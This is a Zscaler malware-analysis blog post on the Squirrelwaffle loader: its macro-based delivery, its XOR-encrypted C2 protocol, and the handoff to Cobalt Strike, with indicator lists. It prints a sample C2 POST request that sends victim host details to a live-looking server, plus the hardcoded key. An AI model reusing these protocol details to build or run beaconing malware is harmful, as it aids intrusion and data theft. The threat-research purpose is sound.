Zscaler Blog

Get the latest Zscaler blog updates in your inbox

Subscribe
Security Research

Squirrelwaffle: New Loader Delivering Cobalt Strike

AVINASH KUMAR, BRETT STONE-GROSS
September 28, 2021 - 12 min read

Zscaler ThreatLabz has been following an emerging new malware loader known as Squirrelwaffle that is being used to deliver Cobalt Strike. In this blog, we will be analyzing the complete attack chain for this new malware family (as shown in Figure 1). This campaign has been running since mid-September 2021. The Squirrelwaffle loader is being delivered from the same infrastructure that was delivering the Qakbot banking trojan.

 

Attack Chain

Figure 1: Squirrelwaffle Attack Chain

Figure 1: Squirrelwaffle Attack Chain

 

Key Points

  • The campaign started with a malicious document file delivered via spam email campaigns with embedded URLs.
  • The spam campaign is using an email thread hijacking technique that was previously used for Emotet and Qakbot malware campaigns.
  • The malicious document contains a macro that drops and executes a VBS file in the %ProgramData% folder.
  • The VBS file downloads the Squirrelwaffle loader which in turn downloads another loader which further downloads Cobalt Strike.
  • Newly registered domains are used to host the loader payload.
  • The same infrastructure was used to deliver the Qakbot banking trojan.

Malware Distribution Strategy

Squirrelwaffle campaigns generally start via spam emails that attempt to convince victims to click an embedded URL using a technique known as email thread hijacking. Email thread hijacking leverages emails that have been stolen prior to the attack and later repurposed to dupe a victim into believing that an email is from someone that they know who is replying to the same thread. Once a victim clicks on the URL, a ZIP file is downloaded that contains a Microsoft Word document. These documents follow a similar naming convention matching the regular expression diagram-\d{2,3}.doc.

For example, the file with an MD5 hash E599A656599A2680C9392C7329D9D519 has the filename diagram-346.doc.

This document is using a DocuSign template lure that instructs the user to enable a macro to view the content (as shown in Figure 2). All the other documents analyzed by Zscaler ThreatLabz have exactly the same content with multiple modules that contain VBA code.

Figure 2: Squirrelwaffle Microsoft Word document lure containing a malicious macro

Figure 2: Squirrelwaffle Microsoft Word document lure containing a malicious macro

Once the user enables the macro, an AutoOpen() subroutine is called which then executes a malicious Visual Basic Application (VBA) macro. Here, the AutoOpen() subroutine calls another function efile() in the bxh module. There is a UserForm object in the document which contains a VBS file named pin.vbs that is embedded in the caption of the DocuSign image. The document that contains the macro code leverages cscript.exe to extract the embedded VBS file, which is written to the %ProgramData% folder, and executed using wscript.exe. This VBS file contains an obfuscated PowerShell script with 5 different URLs to download the Squirrelwaffle payload as shown in Figure 3. The payload is written to %ProgramData% with the filename ww1.dll.

Figure 3: Example VBA code that drops a VBS file in the %ProgramData% folder that is used to download Squirrelwaffle

Figure 3: Example VBA code that drops a VBS file in the %ProgramData% folder that is used to download Squirrelwaffle

The VBS file simply uses the IEX (Invoke-Expression) function to download the Squirrelwaffle loader. The payload DLL is executed via rundll32.exe by invoking the export function name ldr.

Figure 4: Example VBS code that downloads and executes the Squirrelwaffle loader.

Figure 4: Example VBS code that downloads and executes the Squirrelwaffle loader.

Example (sanitized) URLs that were used to retrieve Squirrelwaffle are shown below:

hxxps://priyacareers[.]com/u9hDQN9Yy7g/pt.html

hxxps://perfectdemos[.]com/Gv1iNAuMKZ/pt.html

hxxps://bussiness-z[.]ml/ze8pCNTIkrIS/pt.html

hxxps://cablingpoint[.]com/ByH5NDoE3kQA/pt.html

hxxps://bonus.corporatebusinessmachines[.]co.in/1Y0qVNce/pt.html

Figure 5 shows the ProgramData folder after the VBS script is executed and the Squirrelwaffle payloads have been downloaded

Figure 5: Disk artifacts after the pin.vbs file has been executed and downloaded the Squirrelwaffle loader DLL.

Figure 5: Disk artifacts after the pin.vbs file has been executed and downloaded the Squirrelwaffle loader DLL.

The threat actor behind these campaigns has changed some of their TTPs over time. Recently, the initial infection vector has used hidden Microsoft Excel sheets with an Auto_Open() macro, which downloads the Squirrelwafle loader from three different URLs. The Squirrelwaffle loader is subsequently executed via regsvr32.exe. An example for this campaign shown in Figure 6, used a Microsoft Excel document with the MD5 hash 77BD39191FDC817F2F14F0462BFF8D86 and a filename matching the regular expression diagram-\d{1,9}.xls.

Figure 6: Microsoft Excel with a malicious macro used to deliver Squirrelwaffle

Figure 6: Microsoft Excel with a malicious macro used to deliver Squirrelwaffle

The hidden sheet in this Excel document is shown in Figure 7.

Figure 7: Excel 4.0 hidden sheet containing a malicious macro code

Figure 7: Excel 4.0 hidden sheet containing a malicious macro code

The extracted macro code is shown in Figure 8.

Figure 8: Macro code extracted from a hidden Excel sheet

Figure 8: Macro code extracted from a hidden Excel sheet

The threat actor also changed the location where the payload is written to disk. Example (sanitized) URLs that were used to retrieve Squirrelwaffle from this campaign are shown below:

hxxps://cortinastelasytrazos[.]com/Yro6Atvj/sec.html

hxxps://orquideavallenata[.]com/4jmDb0s9sg/sec.html

hxxps://fundacionverdaderosheroes[.]com/gY0Op5Jkht/sec.html

 

Technical Analysis of the Payload

This analysis covers the Squirrelwaffle with the MD5 hash 479DAE0F72F4D57BD20E0BF8CB3EBDF7. Once the Squirrelwaffle payload is downloaded, it will either be executed via rundll32.exe or regsvr.exe depending upon the initial infection vector that was used to download the payload. Squirrelwaffle loader samples have a recent compilation date using Visual Studio 2017 as shown in Figure 9.

Figure 9: Squirrelwaffle compilation metadata

Figure 9: Squirrelwaffle compilation metadata

The Squirrelwaffle loader is a 32-bit DLL, which is packed with a custom packer. Similar packers have been observed in other malware families including Ursnif and Zloader.

Squirrelwaffle contains a hardcoded configuration that is encrypted in the binary. There are two main components: a list of CnC URLs and a list of IP addresses to block, which belong to sandboxes and analysis platforms. These lists are obfuscated using an XOR-based algorithm with hardcoded keys. An example formatted Squirrelwaffle configuration is shown in Figure 10.

Figure 10: Formatted Squirrelwaffle configuration after decryption

Figure 10: Formatted Squirrelwaffle configuration after decryption

Once the malware decodes all of the CnC domains and IP addresses to block, it creates a socket and sends the data using the send() function and receives the content from the CnC using recv() calls. The CnC communication protocol utilizes an HTTP POST request with a Base64 encoded payload that is encrypted using an XOR-based algorithm with the hardcoded key KJKLO. An example HTTP POST request is shown below:

POST /dXf4cS4GPL/fXMKNg0nKzN/DA15DggBI0N6dX1le310YXlkenw= HTTP/1.1

Host: test.dirigu.ro

Content-Length: 76

eHp+fHZ7Q0ICAAUPQkUMcRYePyo5ORcrKiQ4LCkTCjo7CC4/KxceIConIiIoQkMHHw0CAhoKRkI=

Note that this request does not contain a User-Agent field in the HTTP header.

The path of the HTTP POST request consists of a hardcoded prefix and a Base64 encoded string that is encrypted using the same XOR-based algorithm and key as described above. This encoded string includes an alphanumeric string with a random length between 1 and 28 characters followed by the IP address of the system. Each field is delimited by a single tab character. An example before encryption is shown below:

t2nQfj3SL3XByImciQTqVa\t192.168.125.11

The HTTP POST body contains another Base64 encoded string that includes the victim’s computer name, username, application data directory, and workgroup. Each field is delimited with two tab characters. An example payload before encryption is shown below:

GEORGE-PC\t\tgeorge\t\tC:\\Users\\george\\AppData\\Roaming\t\tWORKGROUP\t\t

This payload is also encrypted with the same XOR-based algorithm and key as the HTTP POST path component.

The SquirrelWaffle CnC responds with a Base64 encoded payload that uses the same encryption schema with another format that uses two tab characters as delimiter between fields. These fields include a status code, a timestamp, the external IP address of the system, along with the victim’s system information that was previously sent. An example decrypted response is shown below:

200\r\n\t\t\n\r1631911856\r\n\t\t\n\r174.197.7.69\r\n\t\t\n\rGEORGE-PC\t\tgeorge\t\tC:\\Users\\george\\AppData\\Roaming\t\tWORKGROUP\t\t\r\n\t\t\n\rNONE\r\n\t\t\n\rNONE\r\n\t\t\n\rNONE\r\n\t\t\n\r\r\n\t\t\n\r\r\n\t\t\n\r\r\n\t\t\n\r\r\n\t\t\n\r\r\n\t\t\n\r\r\n\t\t\n\r\r\n\t\t\n\r

The SquirrelWaffle CnC response may also contain a second-stage payload. An example decrypted response is shown below:

200\r\n\t\t\n\r1631913267\r\n\t\t\n\r174.197.7.69\r\n\t\t\n\rGEORGE-PC\t\tgeorge\t\tC:\\Users\\george\\AppData\\Roaming\t\tWORKGROUP\t\t\r\n\t\t\n\rNONE\r\n\t\t\n\rNONE\r\n\t\t\n\rMZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe8\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4\t\xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode...\x00\x00\r\n\t\t\n\r\r\n\t\t\n\r\r\n\t\t\n\r\r\n\t\t\n\r\r\n\t\t\n\r\r\n\t\t\n\r\r\n\t\t\n\r\r\n\t\t\n\r

This second-stage payload will be written to a filename that consists of eleven random alphanumeric characters appended with a .txt extension, and then executed by SquirrelWaffle.

Zscaler ThreatLabz has observed Squirrelwaffle deliver an executable file with the MD5 hash 116301FD453397FDF3CB291341924147. This file is packed and decrypted in memory to produce a Cobalt Strike stager with the MD5 hash 38DB72B33ABCEA250F5B7CB5AB514B2C, which further downloads the Cobalt Strike beacon.

Figure 11 below shows interesting strings in the Cobalt Strike stager that impersonates a jQuery request. The EICAR string is likely an artifact from the threat actor using a demo version of Cobalt Strike.

Figure 11: Cobalt Strike stager delivered by Squirrelwaffle with interesting strings highlighted.

Figure 11: Cobalt Strike stager delivered by Squirrelwaffle with interesting strings highlighted.

The Cobalt Strike stager sends an HTTPS GET request to 213.227.154[.]92 with the path /jquery-3.3.1.slim.min.js. The Cobalt Strike CnC server responds with a jQuery file with the encrypted Cobalt Strike beacon embedded as binary data in the middle of the file as shown in Figure 12.
Figure 12: Encrypted Cobalt Strike beacon embedded in jQuery code starting at offset 0xfaf.

Figure 12: Encrypted Cobalt Strike beacon embedded in jQuery code starting at offset 0xfaf.

This binary data consists of shellcode that decrypts the Cobalt Strike beacon using the XOR-based algorithm replicated below in Figure 13.

Figure 13: Cobalt Strike beacon decryption algorithm.

Figure 13: Cobalt Strike beacon decryption algorithm.

The Cobalt Strike beacon observed by Zscaler ThreatLabz contains the following CnC servers:

hxxps://systemmentorsec.com/jquery-3.3.1.min.js,

hxxps://213.227.154.92/jquery-3.3.1.min.js

 

Cloud Sandbox Detection

Figure 14: Zscaler Cloud Sandbox detection of Squirrelwaffle Loader

Figure 14: Zscaler Cloud Sandbox detection of Squirrelwaffle Loader

In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels including the signature shown below:

Win32.Downloader.Squirrelwaffle

 

Conclusion

After the Emotet botnet takedown earlier this year, criminal threat actors are filling that void. Squirrelwaffle appears to be a new loader taking advantage of this gap. It is not yet clear if Squirrelwaffle is developed and distributed by a known threat actor or a new group. However, similar distribution techniques were previously used by Emotet. The Zscaler ThreatLabz team will continue to monitor this attack, as well as others, to help keep our customers safe.

 

MITRE ATT&CK TTP Mapping

TacticTechnique
T1059Command and Scripting Interpreter
T1592Gather Victim Host Information
T1569System Services
T1137Office Application Startup
T1055Process Injection
T1140Deobfuscate/Decode Files or Information
T1436Commonly Used Port
T1437Standard Application Layer Protocol
T1106Native API

 

Indicators of Compromise

Squirrelwaffle ZIP archive URLs

  • hxxp://amaimaging[.]com/voluptas-quidem/documents.zip
  • hxxp://beautifulgist[.]com/id-alias/documents.zip
  • hxxp://bussiness-z[.]ml/qui-quia/documents.zip
  • hxxp://gadhwadasamaj.techofi[.]in/expedita-consequatur/documents.zip
  • hxxp://inetworx.co[.]za/voluptate-sunt/documents.zip
  • hxxp://insurance.akademiilmujaya[.]com/beatae-sunt/documents.zip
  • hxxp://prevenzioneformazionelavoro[.]it/quasi-reprehenderit/documents.zip
  • hxxp://procatodicadelacosta[.]com/neque-et/documents.zip
  • hxxp://readgasm[.]com/repudiandae-provident/documents.zip
  • hxxp://rinconadadellago[.]com.mx/qui-quia/documents.zip
  • hxxp://saraviatowing[.]net/et-praesentium/documents.zip
  • hxxp://shahanaschool[.]in/illum-accusamus/documents.zip
  • hxxp://srv7.corpwebcontrol[.]com/np/prog_est.zip
  • hxxp://srv7.corpwebcontrol[.]com/np/user_est.zip
  • hxxp://stripemovired.ramfactoryarg[.]com/nostrum-ab/documents.zip
  • hxxp://syncun[.]com/natus-aut/documents.zip
  • hxxp://tradingview-brokers.skoconstructionng[.]com/molestiae-voluptatum/documents.zip
  • hxxps://abogados-en-medellin[.]com/odit-error/documents.zip
  • hxxps://amaimaging[.]com/voluptas-quidem/ducimus.zip
  • hxxps://builtbvbh-com[.]gq/eum-est/voluptas.zip
  • hxxps://builtbybh-com[.]gq/eum-est/voluptas.zip
  • hxxps://builtybybh-com[.]gq/eum-est/voluptas.zip
  • hxxps://cctvfiles[.]xyz/aliquam-ipsam/documents.zip
  • hxxps://focus.focalrack[.]com/enim-rerum/ducimus.zip
  • hxxps://inetworx.co[.]za/voluptate-sunt/est.zip
  • hxxps://kmslogistik[.]com/repellat-et/est.zip
  • hxxps://moeinjelveh[.]ir/et-eligendi/placeat.zip
  • hxxps://readgasm[.]com/repudiandae-provident/voluptas.zip
  • hxxps://saraviatowing[.]net/et-praesentium/placeat.zip
  • hxxps://sextoystore.co[.]in/temporibus-aut/est.zip
  • hxxps://shivrajengineering[.]in/qui-dolores/placeat.zip

Squirrelwaffle Loader URLs

  • hxxps://ghapan[.]com/Kdg73onC3oQ/090921.html
  • hxxps://yoowi[.]net/tDzEJ8uVGwdj/130921.html
  • hxxps://gruasingenieria[.]pe/LUS1NTVui6/090921.html
  • hxxps://chaturanga.groopy[.]com/7SEZBnhMLW/130921.html
  • hxxps://lotolands[.]com/JtaTAt4Ej/130921.html
  • hxxps://cortinastelasytrazos[.]com/Yro6Atvj/sec.html
  • hxxps://orquideavallenata[.]com/4jmDb0s9sg/sec.html
  • hxxps://fundacionverdaderosheroes[.]com/gY0Op5Jkht/sec.html

Squirrelwaffle Word Document File MD5 Hashes

  • 326498ae163f0d6b8a863d24793f152d
  • 2156a1a8b0c579a51ea77d1bc7062b49
  • 5e9f33e5baa6d6efca91c8db78c01bd0
  • fae4ca3c95a5068063637b2f2ed3a5b2
  • a449e5044437c453fce2ead881aa8161
  • c27545fbb3b4ff35277bce1383655e46
  • c774e400b46f4c0bb90c11e349bc36a0
  • c2ed8fc614aeda36a7e3a638fa7db16a
  • db11964b27738bf4e3a1501e11bd54ad
  • 822e20c95df7165009600a9bfbff9b5e
  • c1ed800a4ae9d4efd61de3aa7fd657b4
  • b478bc389fc15e17b231984fa80e2b0d
  • e599a656599a2680c9392c7329d9d519
  • da48063b7d75ec645f4370b95c28675c
  • c3bd4145feaaae541cb17ccc7cbd2e44
  • 558f97103085394c3a35c9b03839fe72
  • a07f5b21376cd2b661f36dcdc2081b75
  • 5b50f7beabcff32bd02de2dda2766a7b

Squirrelwaffle VBS File MD5 Hash

  • 9da69f65ce4e8e57aef3ea1dd96f42ec

Squirrelwaffle Loader MD5 Hashes

  • 7e9ba57db08f53b56715b0a8121bd839
  • 5ec89ea30af2cc38ae183d12ffacbcf7
  • a3ecc9951178447b546b004ea2dfd93f
  • 9545905ea3735dcac289eead39e3f893
  • 732ce2ef4b18042ef9e3f3e52ad59916
  • cb905bb6a38b5d253eb64aab46eafbd7
  • ebeeef845d0d666363935da89a57b44d

Unpacked DLL file MD5 Hash

  • 3ecc9ca5e744d7ddafa04834c70b95c3

Domain used by the DLL for Squirrelwaffle CnC

  • 107[.]180[.]12[.]15 port 80 centralfloridaasphalt[.]com
  • 119[.]235[.]250[.]50 port 80 kmslogistik[.]com
  • 143[.]95[.]80[.]83 port 80 chaturanga[.]groopy[.]com
  • 160[.]153[.]129[.]37 port 80 mercyfoundationcio[.]org
  • 160[.]153[.]129[.]37 port 80 shoeclearanceoutlet[.]co[.]uk
  • 160[.]153[.]131[.]187 port 80 spiritofprespa[.]com
  • 166[.]62[.]28[.]139 port 80 jhehosting[.]com
  • 166[.]62[.]28[.]139 port 80 key4net[.]com
  • 166[.]62[.]28[.]139 port 80 lead[.]jhinfotech[.]co
  • 166[.]62[.]28[.]139 port 80 voip[.]voipcallhub[.]com
  • 166[.]62[.]28[.]139 port 80 voipcallhub[.]com
  • 194[.]181[.]228[.]45 port 80 bartek-lenart[.]pl
  • 194[.]181[.]228[.]45 port 80 lenartsa[.]webd[.]pro
  • 202[.]52[.]147[.]113 port 80 amjsys[.]com
  • 203[.]124[.]44[.]95 port 80 novamarketing[.]com[.]pk
  • 216[.]219[.]81[.]3 port 80 ems[.]prodigygroupindia[.]com
  • 216[.]219[.]81[.]3 port 80 hrms[.]prodigygroupindia[.]com

Cobalt Strike Stager MD5 Hashes

  • 116301fd453397fdf3cb291341924147
  • ef799b5261fd69b56c8b70a3d22d5120

Cobalt Strike CnC Servers

  • 213.227.154[.]92:443/jquery-3.3.1.min.js
  • 213.227.154[.]92:8080/jquery-3.3.1.min.js
  • systemmentorsec[.]com:443/jquery-3.3.1.min.js
  • systemmentorsec[.]com:8080/jquery-3.3.1.min.js
form submtited
Thank you for reading

Was this post useful?

Get the latest Zscaler blog updates in your inbox

By submitting the form, you are agreeing to our privacy policy.